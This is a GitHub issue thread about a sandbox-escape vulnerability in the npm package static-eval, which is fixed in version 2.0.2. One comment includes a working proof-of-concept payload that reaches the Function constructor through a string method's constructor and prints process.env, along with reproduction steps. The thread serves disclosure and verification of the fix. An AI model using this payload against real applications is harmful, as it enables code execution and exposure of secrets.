-
Notifications
You must be signed in to change notification settings - Fork 27
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
security issue #20
Comments
#21 fixes the security issue |
@substack Can you please take a look? |
Despite the release 4 hours ago, this remains applicable. Is that a mistake? Im going to assume NPM has some kind of review process? Thank you for the quick response! |
Turns out it doesn't due to scoping issues. #23 is the intended fix. |
Similar behavior here! |
We are experiencing the same thing. My application has to pass npm audit for regulatory compliance. please advise. |
I've run the proof on concept with 2.0.1 and the output is the whole set of environment variables. Upgrading to 2.0.2 outputs First, create the index file in a new directory. index:js: var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1})); Then create the package file with deps (using cd NEW-DIR # where you created index.js
npm init -y
npm install static-eval@2.0.1 esprima
node . Should output environment variables, which we wanted to prevent by using static-eval. npm install static-eval@2.0.2
node . Should only output Who can update the advisory? |
Updated |
Ping; closing time :-) |
https://npmjs.com/advisories/758
The text was updated successfully, but these errors were encountered: